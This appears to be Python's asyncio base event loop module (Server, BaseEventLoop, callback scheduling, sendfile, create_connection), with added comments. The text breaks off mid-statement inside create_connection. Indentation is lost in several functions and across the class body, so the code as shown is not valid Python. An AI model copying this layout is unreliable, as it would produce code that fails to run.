"""Base implementation of event loop.
The event loop can be broken up into a multiplexer (the part
responsible for notifying us of I/O events) and the event loop proper,
which wraps a multiplexer with functionality for scheduling callbacks,
immediately or at a given time in the future.
Whenever a public API takes a callback, subsequent positional
arguments will be passed to the callback if/when it is called. This
avoids the proliferation of trivial lambdas implementing closures.
Keyword arguments for the callback are not supported; this is a
conscious design decision, leaving the door open for keyword arguments
to modify the meaning of the API call itself.
"""
import collections
import collections.abc
import concurrent.futures
import functools
import heapq
import itertools
import os
import socket
import stat
import subprocess
import threading
import time
import traceback
import sys
import warnings
import weakref
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from . import constants
from . import coroutines
from . import events
from . import exceptions
from . import futures
from . import protocols
from . import sslproto
from . import staggered
from . import tasks
from . import transports
from . import trsock
from .log import logger
# Public API of this module.
__all__ = 'BaseEventLoop',
# Minimum number of _scheduled timer handles before cleanup of
# cancelled handles is performed.
_MIN_SCHEDULED_TIMER_HANDLES = 100
# Minimum fraction of _scheduled timer handles that are cancelled
# before cleanup of cancelled handles is performed.
_MIN_CANCELLED_TIMER_HANDLES_FRACTION = 0.5
# True when the platform's socket module was built with IPv6 support.
_HAS_IPv6 = hasattr(socket, 'AF_INET6')
# Maximum timeout passed to select to avoid OS limitations
MAXIMUM_SELECT_TIMEOUT = 24 * 3600
def _format_handle(handle):
    """Return a readable description of *handle* for debug logging.

    When the handle wraps a bound method of a Task, show the task's
    repr instead of the generic handle repr.
    """
    callback = handle._callback
    bound_to = getattr(callback, '__self__', None)
    if isinstance(bound_to, tasks.Task):
        # format the task
        return repr(bound_to)
    return str(handle)
def _format_pipe(fd):
if fd == subprocess.PIPE:
return '<pipe>'
elif fd == subprocess.STDOUT:
return '<stdout>'
else:
return repr(fd)
def _set_reuseport(sock):
if not hasattr(socket, 'SO_REUSEPORT'):
raise ValueError('reuse_port not supported by socket module')
else:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
except OSError:
raise ValueError('reuse_port not supported by socket module, '
'SO_REUSEPORT defined but not implemented.')
def _ipaddr_info(host, port, family, type, proto, flowinfo=0, scopeid=0):
    """Return an addrinfo 5-tuple when *host* is already a numeric IP.

    Lets callers skip a getaddrinfo() round-trip when the user passed a
    pre-resolved address; returns None whenever getaddrinfo() is needed.
    """
    if not hasattr(socket, 'inet_pton'):
        return
    if host is None or \
            proto not in {0, socket.IPPROTO_TCP, socket.IPPROTO_UDP}:
        return None
    if type == socket.SOCK_STREAM:
        proto = socket.IPPROTO_TCP
    elif type == socket.SOCK_DGRAM:
        proto = socket.IPPROTO_UDP
    else:
        return None
    if port is None:
        port = 0
    elif isinstance(port, (bytes, str)) and not port:
        # Empty string/bytes means "any port".
        port = 0
    else:
        # If port's a service name like "http", don't skip getaddrinfo.
        try:
            port = int(port)
        except (TypeError, ValueError):
            return None
    if family == socket.AF_UNSPEC:
        afs = [socket.AF_INET]
        if _HAS_IPv6:
            afs.append(socket.AF_INET6)
    else:
        afs = [family]
    if isinstance(host, bytes):
        host = host.decode('idna')
    if '%' in host:
        # Linux's inet_pton doesn't accept an IPv6 zone index after host,
        # like '::1%lo0'.
        return None
    for af in afs:
        try:
            socket.inet_pton(af, host)
        except OSError:
            continue
        # Parse succeeded: the host has already been resolved.
        if _HAS_IPv6 and af == socket.AF_INET6:
            return af, type, proto, '', (host, port, flowinfo, scopeid)
        return af, type, proto, '', (host, port)
    # "host" is not an IP address.
    return None
def _interleave_addrinfos(addrinfos, first_address_family_count=1):
"""Interleave list of addrinfo tuples by family."""
# Group addresses by family
addrinfos_by_family = collections.OrderedDict()
for addr in addrinfos:
family = addr[0]
if family not in addrinfos_by_family:
addrinfos_by_family[family] = []
addrinfos_by_family[family].append(addr)
addrinfos_lists = list(addrinfos_by_family.values())
reordered = []
if first_address_family_count > 1:
reordered.extend(addrinfos_lists[0][:first_address_family_count - 1])
del addrinfos_lists[0][:first_address_family_count - 1]
reordered.extend(
a for a in itertools.chain.from_iterable(
itertools.zip_longest(*addrinfos_lists)
) if a is not None)
return reordered
def _run_until_complete_cb(fut):
    """Done-callback that stops the owning loop once *fut* completes."""
    if not fut.cancelled():
        if isinstance(fut.exception(), (SystemExit, KeyboardInterrupt)):
            # Issue #22429: run_forever() already finished, no need to
            # stop it.
            return
    futures._get_loop(fut).stop()
if hasattr(socket, 'TCP_NODELAY'):
def _set_nodelay(sock):
if (sock.family in {socket.AF_INET, socket.AF_INET6} and
sock.type == socket.SOCK_STREAM and
sock.proto == socket.IPPROTO_TCP):
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
else:
def _set_nodelay(sock):
pass
class _SendfileFallbackProtocol(protocols.Protocol):
    """Temporary protocol installed while _sendfile_fallback() runs.

    It parks the transport's real protocol, pauses reading, and turns the
    transport's flow-control callbacks (pause_writing/resume_writing) into
    an awaitable drain() so file data can be streamed without overrunning
    the write buffer. restore() puts the original protocol back.
    """

    def __init__(self, transp):
        if not isinstance(transp, transports._FlowControlMixin):
            raise TypeError("transport should be _FlowControlMixin instance")
        self._transport = transp
        # The real protocol, reinstalled by restore().
        self._proto = transp.get_protocol()
        # Remember reading/writing state so restore() can put it back.
        self._should_resume_reading = transp.is_reading()
        self._should_resume_writing = transp._protocol_paused
        transp.pause_reading()
        transp.set_protocol(self)
        if self._should_resume_writing:
            # Writing is currently paused: drain() must wait until
            # resume_writing() fires.
            self._write_ready_fut = self._transport._loop.create_future()
        else:
            self._write_ready_fut = None

    async def drain(self):
        # Wait until the transport is ready to accept more data.
        if self._transport.is_closing():
            raise ConnectionError("Connection closed by peer")
        fut = self._write_ready_fut
        if fut is None:
            return
        await fut

    def connection_made(self, transport):
        raise RuntimeError("Invalid state: "
                           "connection should have been established already.")

    def connection_lost(self, exc):
        if self._write_ready_fut is not None:
            # Never happens if peer disconnects after sending the whole content
            # Thus disconnection is always an exception from user perspective
            if exc is None:
                self._write_ready_fut.set_exception(
                    ConnectionError("Connection is closed by peer"))
            else:
                self._write_ready_fut.set_exception(exc)
        self._proto.connection_lost(exc)

    def pause_writing(self):
        if self._write_ready_fut is not None:
            return
        self._write_ready_fut = self._transport._loop.create_future()

    def resume_writing(self):
        if self._write_ready_fut is None:
            return
        self._write_ready_fut.set_result(False)
        self._write_ready_fut = None

    def data_received(self, data):
        raise RuntimeError("Invalid state: reading should be paused")

    def eof_received(self):
        raise RuntimeError("Invalid state: reading should be paused")

    async def restore(self):
        # Reinstall the original protocol and saved reading/writing state.
        self._transport.set_protocol(self._proto)
        if self._should_resume_reading:
            self._transport.resume_reading()
        if self._write_ready_fut is not None:
            # Cancel the future.
            # Basically it has no effect because protocol is switched back,
            # no code should wait for it anymore.
            self._write_ready_fut.cancel()
        if self._should_resume_writing:
            self._proto.resume_writing()
class Server(events.AbstractServer):
    """Server object returned by loop.create_server().

    Tracks listening sockets, the number of live client transports
    (via _attach/_detach), and futures created by wait_closed().
    """

    def __init__(self, loop, sockets, protocol_factory, ssl_context, backlog,
                 ssl_handshake_timeout):
        self._loop = loop
        self._sockets = sockets
        # Number of client transports currently alive on this server.
        self._active_count = 0
        # wait_closed() futures; set to None once woken by _wakeup().
        self._waiters = []
        self._protocol_factory = protocol_factory
        self._backlog = backlog
        self._ssl_context = ssl_context
        self._ssl_handshake_timeout = ssl_handshake_timeout
        self._serving = False
        self._serving_forever_fut = None

    def __repr__(self):
        return f'<{self.__class__.__name__} sockets={self.sockets!r}>'

    def _attach(self):
        # Called by a transport when a new client connection is accepted.
        assert self._sockets is not None
        self._active_count += 1

    def _detach(self):
        # Called by a transport when a client connection is finished.
        assert self._active_count > 0
        self._active_count -= 1
        if self._active_count == 0 and self._sockets is None:
            # Last connection gone after close(): release wait_closed().
            self._wakeup()

    def _wakeup(self):
        # Resolve all pending wait_closed() futures exactly once.
        waiters = self._waiters
        self._waiters = None
        for waiter in waiters:
            if not waiter.done():
                waiter.set_result(waiter)

    def _start_serving(self):
        if self._serving:
            return
        self._serving = True
        for sock in self._sockets:
            sock.listen(self._backlog)
            self._loop._start_serving(
                self._protocol_factory, sock, self._ssl_context,
                self, self._backlog, self._ssl_handshake_timeout)

    def get_loop(self):
        return self._loop

    def is_serving(self):
        return self._serving

    @property
    def sockets(self):
        # Read-only socket wrappers; empty tuple once closed.
        if self._sockets is None:
            return ()
        return tuple(trsock.TransportSocket(s) for s in self._sockets)

    def close(self):
        sockets = self._sockets
        if sockets is None:
            # Already closed.
            return
        self._sockets = None
        for sock in sockets:
            self._loop._stop_serving(sock)
        self._serving = False
        if (self._serving_forever_fut is not None and
                not self._serving_forever_fut.done()):
            self._serving_forever_fut.cancel()
            self._serving_forever_fut = None
        if self._active_count == 0:
            # No live connections: wake wait_closed() immediately.
            self._wakeup()

    async def start_serving(self):
        self._start_serving()
        # Skip one loop iteration so that all 'loop.add_reader'
        # go through.
        await tasks.sleep(0)

    async def serve_forever(self):
        if self._serving_forever_fut is not None:
            raise RuntimeError(
                f'server {self!r} is already being awaited on serve_forever()')
        if self._sockets is None:
            raise RuntimeError(f'server {self!r} is closed')
        self._start_serving()
        self._serving_forever_fut = self._loop.create_future()
        try:
            await self._serving_forever_fut
        except exceptions.CancelledError:
            try:
                # Cancellation shuts the server down cleanly before
                # re-raising to the caller.
                self.close()
                await self.wait_closed()
            finally:
                raise
        finally:
            self._serving_forever_fut = None

    async def wait_closed(self):
        if self._sockets is None or self._waiters is None:
            # Already closed and all waiters already woken.
            return
        waiter = self._loop.create_future()
        self._waiters.append(waiter)
        await waiter
class BaseEventLoop(events.AbstractEventLoop):
def __init__(self):
    # Count of cancelled TimerHandles still in self._scheduled; used to
    # decide when to compact the timer heap.
    self._timer_cancelled_count = 0
    self._closed = False
    self._stopping = False
    # FIFO of Handles to run on the next _run_once() pass.
    self._ready = collections.deque()
    # Min-heap of TimerHandles ordered by deadline.
    self._scheduled = []
    self._default_executor = None
    self._internal_fds = 0
    # Identifier of the thread running the event loop, or None if the
    # event loop is not running
    self._thread_id = None
    self._clock_resolution = time.get_clock_info('monotonic').resolution
    self._exception_handler = None
    # Debug mode defaults from PYTHONASYNCIODEBUG / -X dev.
    self.set_debug(coroutines._is_debug_mode())
    # In debug mode, if the execution of a callback or a step of a task
    # exceed this duration in seconds, the slow callback/task is logged.
    self.slow_callback_duration = 0.1
    self._current_handle = None
    self._task_factory = None
    self._coroutine_origin_tracking_enabled = False
    self._coroutine_origin_tracking_saved_depth = None
    # A weak set of all asynchronous generators that are
    # being iterated by the loop.
    self._asyncgens = weakref.WeakSet()
    # Set to True when `loop.shutdown_asyncgens` is called.
    self._asyncgens_shutdown_called = False
    # Set to True when `loop.shutdown_default_executor` is called.
    self._executor_shutdown_called = False
def __repr__(self):
    """Summarize the loop's running/closed/debug state."""
    cls_name = self.__class__.__name__
    state = (f'running={self.is_running()} '
             f'closed={self.is_closed()} debug={self.get_debug()}')
    return f'<{cls_name} {state}>'
def create_future(self):
    """Create a Future object attached to the loop."""
    # Subclasses may override this to return a custom Future subclass.
    return futures.Future(loop=self)
def create_task(self, coro, *, name=None):
    """Schedule a coroutine object.

    Return a task object.
    """
    self._check_closed()
    if self._task_factory is None:
        task = tasks.Task(coro, loop=self, name=name)
        if task._source_traceback:
            # Drop this frame from the captured creation traceback.
            del task._source_traceback[-1]
    else:
        task = self._task_factory(self, coro)
        # Custom factories take no name argument; set it afterwards.
        tasks._set_task_name(task, name)
    return task
def set_task_factory(self, factory):
    """Set a task factory that will be used by loop.create_task().

    If factory is None the default task factory will be set.

    If factory is a callable, it should have a signature matching
    '(loop, coro)', where 'loop' will be a reference to the active
    event loop, 'coro' will be a coroutine object. The callable
    must return a Future.
    """
    if not (factory is None or callable(factory)):
        raise TypeError('task factory must be a callable or None')
    self._task_factory = factory
def get_task_factory(self):
    """Return a task factory, or None if the default one is in use."""
    return self._task_factory
def _make_socket_transport(self, sock, protocol, waiter=None, *,
                           extra=None, server=None):
    """Create socket transport."""
    # Provided by concrete subclasses (selector/proactor event loops).
    raise NotImplementedError
def _make_ssl_transport(
        self, rawsock, protocol, sslcontext, waiter=None,
        *, server_side=False, server_hostname=None,
        extra=None, server=None,
        ssl_handshake_timeout=None,
        call_connection_made=True):
    """Create SSL transport."""
    # Provided by concrete subclasses (selector/proactor event loops).
    raise NotImplementedError
def _make_datagram_transport(self, sock, protocol,
                             address=None, waiter=None, extra=None):
    """Create datagram transport."""
    # Provided by concrete subclasses (selector/proactor event loops).
    raise NotImplementedError
def _make_read_pipe_transport(self, pipe, protocol, waiter=None,
                              extra=None):
    """Create read pipe transport."""
    # Provided by concrete subclasses (selector/proactor event loops).
    raise NotImplementedError
def _make_write_pipe_transport(self, pipe, protocol, waiter=None,
                               extra=None):
    """Create write pipe transport."""
    # Provided by concrete subclasses (selector/proactor event loops).
    raise NotImplementedError
async def _make_subprocess_transport(self, protocol, args, shell,
                                     stdin, stdout, stderr, bufsize,
                                     extra=None, **kwargs):
    """Create subprocess transport."""
    # Provided by concrete subclasses (selector/proactor event loops).
    raise NotImplementedError
def _write_to_self(self):
    """Write a byte to self-pipe, to wake up the event loop.

    This may be called from a different thread.

    The subclass is responsible for implementing the self-pipe.
    """
    raise NotImplementedError
def _process_events(self, event_list):
    """Process selector events."""
    # Provided by concrete subclasses (selector/proactor event loops).
    raise NotImplementedError
def _check_closed(self):
    """Raise RuntimeError if the loop has been closed."""
    if not self._closed:
        return
    raise RuntimeError('Event loop is closed')
def _check_default_executor(self):
    """Raise RuntimeError if the default executor was shut down."""
    if not self._executor_shutdown_called:
        return
    raise RuntimeError('Executor shutdown has been called')
def _asyncgen_finalizer_hook(self, agen):
    """Interpreter hook: finalize an async generator on this loop."""
    self._asyncgens.discard(agen)
    if self.is_closed():
        return
    # May run from a GC in another thread, hence the threadsafe call.
    self.call_soon_threadsafe(self.create_task, agen.aclose())
def _asyncgen_firstiter_hook(self, agen):
    """Interpreter hook: track an async generator on first iteration."""
    if self._asyncgens_shutdown_called:
        message = (f"asynchronous generator {agen!r} was scheduled after "
                   f"loop.shutdown_asyncgens() call")
        warnings.warn(message, ResourceWarning, source=self)
    self._asyncgens.add(agen)
async def shutdown_asyncgens(self):
    """Shutdown all active asynchronous generators."""
    self._asyncgens_shutdown_called = True
    if not len(self._asyncgens):
        # If Python version is <3.6 or we don't have any asynchronous
        # generators alive.
        return
    closing_agens = list(self._asyncgens)
    self._asyncgens.clear()
    # Close all generators concurrently, collecting per-generator errors
    # instead of failing on the first one.
    results = await tasks.gather(
        *[ag.aclose() for ag in closing_agens],
        return_exceptions=True)
    for result, agen in zip(results, closing_agens):
        if isinstance(result, Exception):
            self.call_exception_handler({
                'message': f'an error occurred during closing of '
                           f'asynchronous generator {agen!r}',
                'exception': result,
                'asyncgen': agen
            })
async def shutdown_default_executor(self):
    """Schedule the shutdown of the default executor."""
    self._executor_shutdown_called = True
    if self._default_executor is None:
        return
    future = self.create_future()
    # Join the executor from a helper thread so the loop stays responsive
    # while worker threads finish.
    thread = threading.Thread(target=self._do_shutdown, args=(future,))
    thread.start()
    try:
        await future
    finally:
        thread.join()
def _do_shutdown(self, future):
    # Runs in the helper thread started by shutdown_default_executor();
    # reports completion or failure back to the loop thread-safely.
    try:
        self._default_executor.shutdown(wait=True)
        self.call_soon_threadsafe(future.set_result, None)
    except Exception as ex:
        self.call_soon_threadsafe(future.set_exception, ex)
def _check_running(self):
    """Refuse to start when this or any other loop is already running."""
    if self.is_running():
        raise RuntimeError('This event loop is already running')
    if events._get_running_loop() is None:
        return
    raise RuntimeError(
        'Cannot run the event loop while another loop is running')
def run_forever(self):
    """Run until stop() is called."""
    self._check_closed()
    self._check_running()
    self._set_coroutine_origin_tracking(self._debug)
    self._thread_id = threading.get_ident()
    # Install our asyncgen hooks; the previous hooks are restored on exit.
    old_agen_hooks = sys.get_asyncgen_hooks()
    sys.set_asyncgen_hooks(firstiter=self._asyncgen_firstiter_hook,
                           finalizer=self._asyncgen_finalizer_hook)
    try:
        events._set_running_loop(self)
        while True:
            self._run_once()
            if self._stopping:
                break
    finally:
        # Always restore global state, even if a callback raised.
        self._stopping = False
        self._thread_id = None
        events._set_running_loop(None)
        self._set_coroutine_origin_tracking(False)
        sys.set_asyncgen_hooks(*old_agen_hooks)
def run_until_complete(self, future):
    """Run until the Future is done.

    If the argument is a coroutine, it is wrapped in a Task.

    WARNING: It would be disastrous to call run_until_complete()
    with the same coroutine twice -- it would wrap it in two
    different Tasks and that can't be good.

    Return the Future's result, or raise its exception.
    """
    self._check_closed()
    self._check_running()
    new_task = not futures.isfuture(future)
    future = tasks.ensure_future(future, loop=self)
    if new_task:
        # An exception is raised if the future didn't complete, so there
        # is no need to log the "destroy pending task" message
        future._log_destroy_pending = False
    # Stop the loop as soon as the future completes.
    future.add_done_callback(_run_until_complete_cb)
    try:
        self.run_forever()
    except:
        if new_task and future.done() and not future.cancelled():
            # The coroutine raised a BaseException. Consume the exception
            # to not log a warning, the caller doesn't have access to the
            # local task.
            future.exception()
        raise
    finally:
        future.remove_done_callback(_run_until_complete_cb)
    if not future.done():
        raise RuntimeError('Event loop stopped before Future completed.')
    return future.result()
def stop(self):
    """Stop running the event loop.

    Every callback already scheduled will still run. This simply informs
    run_forever to stop looping after a complete iteration.
    """
    self._stopping = True
def close(self):
    """Close the event loop.

    This clears the queues and shuts down the executor,
    but does not wait for the executor to finish.

    The event loop must not be running.
    """
    if self.is_running():
        raise RuntimeError("Cannot close a running event loop")
    if self._closed:
        # Closing twice is a no-op.
        return
    if self._debug:
        logger.debug("Close %r", self)
    self._closed = True
    self._ready.clear()
    self._scheduled.clear()
    self._executor_shutdown_called = True
    executor = self._default_executor
    if executor is not None:
        self._default_executor = None
        # Do not block in close(): workers are left to finish on their own.
        executor.shutdown(wait=False)
def is_closed(self):
    """Return True if the event loop was closed."""
    return self._closed
def __del__(self, _warn=warnings.warn):
    # _warn is bound at definition time so it stays usable even during
    # interpreter shutdown, when module globals may already be cleared.
    if self.is_closed():
        return
    _warn(f"unclosed event loop {self!r}", ResourceWarning, source=self)
    if not self.is_running():
        self.close()
def is_running(self):
    """Return True if the event loop is running."""
    # _thread_id is set for the duration of run_forever() only.
    return (self._thread_id is not None)
def time(self):
    """Return the time according to the event loop's clock.

    This is a float expressed in seconds since an epoch, but the
    epoch, precision, accuracy and drift are unspecified and may
    differ per event loop.
    """
    return time.monotonic()
def call_later(self, delay, callback, *args, context=None):
    """Arrange for a callback to be called at a given time.

    Return a Handle: an opaque object with a cancel() method that
    can be used to cancel the call.

    The delay can be an int or float, expressed in seconds. It is
    always relative to the current time.

    Each callback will be called exactly once. If two callbacks
    are scheduled for exactly the same time, it is undefined which
    will be called first.

    Any positional arguments after the callback will be passed to
    the callback when it is called.
    """
    if delay is None:
        raise TypeError('delay must not be None')
    timer = self.call_at(self.time() + delay, callback, *args,
                         context=context)
    if timer._source_traceback:
        # Drop this frame from the captured creation traceback.
        del timer._source_traceback[-1]
    return timer
def call_at(self, when, callback, *args, context=None):
    """Like call_later(), but uses an absolute time.

    Absolute time corresponds to the event loop's time() method.
    """
    if when is None:
        raise TypeError("when cannot be None")
    self._check_closed()
    if self._debug:
        self._check_thread()
        self._check_callback(callback, 'call_at')
    timer = events.TimerHandle(when, callback, args, self, context)
    if timer._source_traceback:
        # Drop this frame from the captured creation traceback.
        del timer._source_traceback[-1]
    heapq.heappush(self._scheduled, timer)
    timer._scheduled = True
    return timer
def call_soon(self, callback, *args, context=None):
    """Arrange for a callback to be called as soon as possible.

    This operates as a FIFO queue: callbacks are called in the
    order in which they are registered. Each callback will be
    called exactly once.

    Any positional arguments after the callback will be passed to
    the callback when it is called.
    """
    self._check_closed()
    if self._debug:
        self._check_thread()
        self._check_callback(callback, 'call_soon')
    handle = self._call_soon(callback, args, context)
    if handle._source_traceback:
        # Drop this frame from the captured creation traceback.
        del handle._source_traceback[-1]
    return handle
def _check_callback(self, callback, method):
    # Debug-mode validation: reject coroutines (a common user mistake,
    # since they must be scheduled with create_task) and non-callables.
    if (coroutines.iscoroutine(callback) or
            coroutines.iscoroutinefunction(callback)):
        raise TypeError(
            f"coroutines cannot be used with {method}()")
    if not callable(callback):
        raise TypeError(
            f'a callable object was expected by {method}(), '
            f'got {callback!r}')
def _call_soon(self, callback, args, context):
    # Internal helper shared by call_soon() and call_soon_threadsafe();
    # performs no debug checks.
    handle = events.Handle(callback, args, self, context)
    if handle._source_traceback:
        # Drop this helper's frame from the captured creation traceback.
        del handle._source_traceback[-1]
    self._ready.append(handle)
    return handle
def _check_thread(self):
    """Check that the current thread is the thread running the event loop.

    Non-thread-safe methods of this class make this assumption and will
    likely behave incorrectly when the assumption is violated.

    Should only be called when (self._debug == True). The caller is
    responsible for checking this condition for performance reasons.
    """
    expected = self._thread_id
    if expected is None or threading.get_ident() == expected:
        return
    raise RuntimeError(
        "Non-thread-safe operation invoked on an event loop other "
        "than the current one")
def call_soon_threadsafe(self, callback, *args, context=None):
    """Like call_soon(), but thread-safe."""
    self._check_closed()
    if self._debug:
        self._check_callback(callback, 'call_soon_threadsafe')
    handle = self._call_soon(callback, args, context)
    if handle._source_traceback:
        # Drop this frame from the captured creation traceback.
        del handle._source_traceback[-1]
    # Wake the selector in case this was called from another thread.
    self._write_to_self()
    return handle
def run_in_executor(self, executor, func, *args):
    """Run func(*args) in *executor*; return a Future for the result.

    When *executor* is None, the loop's default ThreadPoolExecutor is
    used, creating it lazily on first use.
    """
    self._check_closed()
    if self._debug:
        self._check_callback(func, 'run_in_executor')
    if executor is None:
        executor = self._default_executor
        # Only check when the default executor is being used
        self._check_default_executor()
        if executor is None:
            executor = concurrent.futures.ThreadPoolExecutor(
                thread_name_prefix='asyncio'
            )
            self._default_executor = executor
    return futures.wrap_future(
        executor.submit(func, *args), loop=self)
def set_default_executor(self, executor):
    """Set the default executor used by run_in_executor()."""
    # Only ThreadPoolExecutor is accepted: shutdown_default_executor()
    # and close() assume thread-pool semantics.
    if not isinstance(executor, concurrent.futures.ThreadPoolExecutor):
        raise TypeError('executor must be ThreadPoolExecutor instance')
    self._default_executor = executor
def _getaddrinfo_debug(self, host, port, family, type, proto, flags):
    """Debug wrapper for socket.getaddrinfo() that logs call and timing."""
    msg = [f"{host}:{port!r}"]
    for label, value in (('family', family), ('type', type),
                         ('proto', proto), ('flags', flags)):
        if value:
            msg.append(f'{label}={value!r}')
    msg = ', '.join(msg)
    logger.debug('Get address info %s', msg)
    t0 = self.time()
    addrinfo = socket.getaddrinfo(host, port, family, type, proto, flags)
    dt = self.time() - t0
    msg = f'Getting address info {msg} took {dt * 1e3:.3f}ms: {addrinfo!r}'
    # Promote slow resolutions to INFO so they stand out.
    if dt >= self.slow_callback_duration:
        logger.info(msg)
    else:
        logger.debug(msg)
    return addrinfo
async def getaddrinfo(self, host, port, *,
                      family=0, type=0, proto=0, flags=0):
    """Asynchronous socket.getaddrinfo(), run in the default executor."""
    resolver = (self._getaddrinfo_debug if self._debug
                else socket.getaddrinfo)
    return await self.run_in_executor(
        None, resolver, host, port, family, type, proto, flags)
async def getnameinfo(self, sockaddr, flags=0):
    """Asynchronous socket.getnameinfo(), run in the default executor."""
    return await self.run_in_executor(
        None, socket.getnameinfo, sockaddr, flags)
async def sock_sendfile(self, sock, file, offset=0, count=None,
                        *, fallback=True):
    """Send a file over *sock*, using os.sendfile() when possible.

    Falls back to a chunked read/sock_sendall() loop when *fallback*
    is true and the native syscall is unavailable for this socket/file
    combination. Returns the total number of bytes sent.
    """
    if self._debug and sock.gettimeout() != 0:
        raise ValueError("the socket must be non-blocking")
    self._check_sendfile_params(sock, file, offset, count)
    try:
        return await self._sock_sendfile_native(sock, file,
                                                offset, count)
    except exceptions.SendfileNotAvailableError:
        # Fix: the caught exception was bound to an unused name
        # ('as exc'); the binding served no purpose.
        if not fallback:
            raise
        return await self._sock_sendfile_fallback(sock, file,
                                                  offset, count)
async def _sock_sendfile_native(self, sock, file, offset, count):
    # NB: sendfile syscall is not supported for SSL sockets and
    # non-mmap files even if sendfile is supported by OS
    #
    # Fix: the second string literal was missing its 'f' prefix, so the
    # error message contained the literal text "{file!r}" instead of
    # the file's repr.
    raise exceptions.SendfileNotAvailableError(
        f"syscall sendfile is not available for socket {sock!r} "
        f"and file {file!r} combination")
async def _sock_sendfile_fallback(self, sock, file, offset, count):
    # Pure-Python fallback: read the file chunk by chunk in an executor
    # and push each chunk through sock_sendall().
    if offset:
        file.seek(offset)
    blocksize = (
        min(count, constants.SENDFILE_FALLBACK_READBUFFER_SIZE)
        if count else constants.SENDFILE_FALLBACK_READBUFFER_SIZE
    )
    buf = bytearray(blocksize)
    total_sent = 0
    try:
        while True:
            if count:
                # Never read past the requested byte count.
                blocksize = min(count - total_sent, blocksize)
                if blocksize <= 0:
                    break
            view = memoryview(buf)[:blocksize]
            read = await self.run_in_executor(None, file.readinto, view)
            if not read:
                break  # EOF
            await self.sock_sendall(sock, view[:read])
            total_sent += read
        return total_sent
    finally:
        if total_sent > 0 and hasattr(file, 'seek'):
            # Leave the file positioned just past the data actually sent.
            file.seek(offset + total_sent)
def _check_sendfile_params(self, sock, file, offset, count):
    """Validate sock_sendfile() arguments, raising TypeError/ValueError."""
    if 'b' not in getattr(file, 'mode', 'b'):
        raise ValueError("file should be opened in binary mode")
    if sock.type != socket.SOCK_STREAM:
        raise ValueError("only SOCK_STREAM type sockets are supported")
    if count is not None:
        if not isinstance(count, int):
            raise TypeError(
                "count must be a positive integer (got {!r})".format(count))
        if count <= 0:
            raise ValueError(
                "count must be a positive integer (got {!r})".format(count))
    if not isinstance(offset, int):
        raise TypeError(
            "offset must be a non-negative integer (got {!r})".format(
                offset))
    if offset < 0:
        raise ValueError(
            "offset must be a non-negative integer (got {!r})".format(
                offset))
async def _connect_sock(self, exceptions, addr_info, local_addr_infos=None):
    """Create, bind and connect one socket."""
    my_exceptions = []
    # Errors for this attempt are collected in a sub-list of *exceptions*
    # so create_connection() can group them per address.
    exceptions.append(my_exceptions)
    family, type_, proto, _, address = addr_info
    sock = None
    try:
        sock = socket.socket(family=family, type=type_, proto=proto)
        sock.setblocking(False)
        if local_addr_infos is not None:
            # Try each candidate local address until one bind succeeds.
            for _, _, _, _, laddr in local_addr_infos:
                try:
                    sock.bind(laddr)
                    break
                except OSError as exc:
                    # Re-raise with a friendlier message naming the address.
                    msg = (
                        f'error while attempting to bind on '
                        f'address {laddr!r}: '
                        f'{exc.strerror.lower()}'
                    )
                    exc = OSError(exc.errno, msg)
                    my_exceptions.append(exc)
            else:  # all bind attempts failed
                raise my_exceptions.pop()
        await self.sock_connect(sock, address)
        return sock
    except OSError as exc:
        my_exceptions.append(exc)
        if sock is not None:
            sock.close()
        raise
    except:
        # Close the socket on any other exception (including
        # BaseException such as CancelledError), then propagate.
        if sock is not None:
            sock.close()
        raise
async def create_connection(
        self, protocol_factory, host=None, port=None,
        *, ssl=None, family=0,
        proto=0, flags=0, sock=None,
        local_addr=None, server_hostname=None,
        ssl_handshake_timeout=None,
        happy_eyeballs_delay=None, interleave=None):
    """Connect to a TCP server.

    Create a streaming transport connection to a given internet host and
    port: socket family AF_INET or socket.AF_INET6 depending on host (or
    family if specified), socket type SOCK_STREAM. protocol_factory must be
    a callable returning a protocol instance.

    This method is a coroutine which will try to establish the connection
    in the background. When successful, the coroutine returns a
    (transport, protocol) pair.
    """
    # --- Validate argument combinations -------------------------------
    if server_hostname is not None and not ssl:
        raise ValueError('server_hostname is only meaningful with ssl')
    if server_hostname is None and ssl:
        # Use host as default for server_hostname. It is an error
        # if host is empty or not set, e.g. when an
        # already-connected socket was passed or when only a port
        # is given. To avoid this error, you can pass
        # server_hostname='' -- this will bypass the hostname
        # check. (This also means that if host is a numeric
        # IP/IPv6 address, we will attempt to verify that exact
        # address; this will probably fail, but it is possible to
        # create a certificate for a specific IP address, so we
        # don't judge it here.)
        if not host:
            raise ValueError('You must set server_hostname '
                             'when using ssl without a host')
        server_hostname = host
    if ssl_handshake_timeout is not None and not ssl:
        raise ValueError(
            'ssl_handshake_timeout is only meaningful with ssl')
    if happy_eyeballs_delay is not None and interleave is None:
        # If using happy eyeballs, default to interleave addresses by family
        interleave = 1
    # --- Resolve addresses and connect --------------------------------
    if host is not None or port is not None:
        if sock is not None:
            raise ValueError(
                'host/port and sock can not be specified at the same time')
        infos = await self._ensure_resolved(
            (host, port), family=family,
            type=socket.SOCK_STREAM, proto=proto, flags=flags, loop=self)
        if not infos:
            raise OSError('getaddrinfo() returned empty list')
        if local_addr is not None:
            laddr_infos = await self._ensure_resolved(
                local_addr, family=family,
                type=socket.SOCK_STREAM, proto=proto,
                flags=flags, loop=self)
            if not laddr_infos:
                raise OSError('getaddrinfo() returned empty list')
        else:
            laddr_infos = None
        if interleave:
            infos = _interleave_addrinfos(infos, interleave)
        exceptions = []
        if happy_eyeballs_delay is None:
            # not using happy eyeballs
            # Try each resolved address in order; first success wins.
            for addrinfo in infos:
                try:
                    sock = await self._connect_sock(
                        exceptions, addrinfo, laddr_infos)
                    break
                except OSError:
                    continue
        else:  # using happy eyeballs
            # Race connection attempts, staggered by the delay (RFC 8305).
            sock, _, _ = await staggered.staggered_race(
                (functools.partial(self._connect_sock,
                                   exceptions, addrinfo, laddr_infos)
                 for addrinfo in infos),
                happy_eyeballs_delay, loop=self)
        if sock is None:
            # All attempts failed: flatten the per-address error groups.
            exceptions = [exc for sub in exceptions for exc in sub]
            if len(exceptions) == 1:
                raise exceptions[0]
            else:
                # If they all have the same str(), raise one.
                model = str(exceptions[0])
                if all(str(exc) == model for exc in exceptions):
                    raise exceptions[0]
                # Raise a combined exception so the user can see all
                # the various error messages.
                raise OSError('Multiple exceptions: {}'.format(
